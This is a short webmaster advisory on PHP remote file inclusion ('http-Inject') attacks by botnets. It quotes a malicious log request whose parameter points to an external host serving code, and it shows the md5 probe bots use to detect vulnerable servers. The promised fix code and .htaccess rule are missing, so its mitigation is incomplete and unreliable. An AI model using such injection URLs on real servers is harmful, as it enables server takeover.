deutsch | |||||
If you find something like that in your logfiles:
"GET /page.php?x=http%3A%2F%2Fwww.alonsaunet.com%2Fwebmaster%2Fromi%2Fjirudog%2F" Your Server is a victim of a http-Inject attack. you may find out that the above url points to a page containing this:
What's going on ?A Zombie network tries to add your Server as a new Zombie for whatever reason. It works like this: In PHP, you may include external files from the internet using e.g. include 'http://www.example.com/file.php'; As soon as you (or your Content-Management System) uses this together with special URL's, You run into the following problem: If 'someone' types an URL like e.g. http://www.example.com/page.php?URL=http%3A%2F%2Fwww.xxx.com/....bad_page.php the code from www.xxx.com/....bad_page.php is executed on YOUR Server. the Result of <?php echo md5("just_a_test"); ?> is "c6db3524fe71d6c576098805a07e79e4" So What ?If 'someone' is not a Person, but a Zombie Computer, it will check out all possible cases to create an access on the just_a_test page. The MD5-Sum c6db3524fe71d6c576098805a07e79e4 apears now somewhere on your page, and the Zombie knows that your Server accepts external PHP scripts.
What to do ?If you do not use 'http:' within your URL's Query_String you may simply add the following code at the beginning of all of your PHP-Files:
your script is able to load external pages, it just gives back an empty Page As an alternative, if you are able to change your .htaccess file, you may create a rewrite rule 403 FORBIDDEN there:
For RewriteEngine on IIS Servers, try google or wikipedia Warn other Webmasters with a Link to this Page: <A HREF='http://www.whyron.com/http.htm'>safe_http</A> |
|